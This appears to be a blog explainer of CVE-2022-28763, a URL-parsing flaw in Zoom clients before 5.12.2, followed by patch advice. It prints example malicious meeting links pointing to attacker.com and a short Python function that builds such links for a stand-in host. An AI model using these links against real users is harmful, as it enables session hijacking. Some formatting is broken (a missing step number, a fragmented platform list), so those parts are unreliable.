Zoom has been a top pick for online meetings ever since the pandemic started, but big popularity often attracts hackers. One such danger came as CVE-2022-28763, a security issue affecting Zoom clients (on Android, iOS, Linux, macOS, Windows) before version 5.12.2. In this post, we’ll break down what CVE-2022-28763 is, how attackers can use it, and show example exploit code—all in everyday language so anyone can understand.
What Is CVE-2022-28763?
CVE-2022-28763 is all about how Zoom handled URLs. If you clicked a Zoom meeting invite, Zoom was supposed to safely open the meeting—but it turns out you could trick Zoom with a *crafted* URL.
> If a malicious Zoom meeting link is opened, it might direct you to connect to a fake or dangerous network address. This could eventually lead to stolen Zoom sessions.
Check out the original advisory here. (Scroll down to 2022 and you’ll see CVE-2022-28763.)
Let’s say you get a Zoom invite like this
zoommtg://zoom.us/join?action=join&confno=123456789&pwd=b4dpasswrd
That’s totally normal. But Zoom was not checking all parts of the URL carefully.
With the bug, attackers could make a link pointing you to a dangerous address—say, their own fake Zoom server, or even their laptop at home, if you were on the same Wi-Fi. You, the victim, would have no clue you were connecting anywhere else.
How the Exploit Works (Step by Step)
1. An attacker crafts a malicious Zoom meeting link that looks harmless, but after you click, Zoom tries to connect to the attacker’s chosen address.
The attacker sends that link in an email, chat, document, or even a fake meeting invite.
3. You click the link, thinking you’re joining a regular meeting. Instead, your Zoom app talks to the attacker’s chosen server or IP.
4. If they’re smart, the attacker could capture your session token—or try to make you reveal more sensitive info.
Example of a Malicious Zoom URL
Before the patch, Zoom ignored some unexpected or malformed URL parts. Here’s a suspicious (fictional) example:
zoommtg://attacker.com/join?action=join&confno=987654321&pwd=b4dbad
Or, even sneakier
zoommtg://zoom.us@attacker.com/join?action=join&confno=987654321&pwd=b4dbad
*In both cases, “attacker.com” is NOT Zoom!*
Here’s a short Python script to create such a link
def make_malicious_zoom_link(attacker_host, meeting_id, password):
return f"zoommtg://zoom.us@{attacker_host}/join?action=join&confno={meeting_id}&pwd={password}"
print(make_malicious_zoom_link("evil.example.com", "123456789", "bad123"))
macOS
- iOS
Linux
…*before version 5.12.2.*
Zoom patched this in version 5.12.2 (September 2022), saying
> “Improved URL parsing to prevent the app from joining meetings hosted on untrusted locations.”
\- Zoom Release Notes
Checking Your Zoom Version
Open Zoom → Click on your picture at top right → “Check for updates.”
Make sure you’re using at least 5.12.2!
Always keep Zoom updated on every device you use it.
- Report suspicious Zoom invites to your IT/security team.
References
- Zoom Security Bulletin for CVE-2022-28763
- NVD Details for CVE-2022-28763
- Patch Notes from Zoom
Timeline
Published on: 10/31/2022 20:15:00 UTC
Last modified on: 11/01/2022 19:43:00 UTC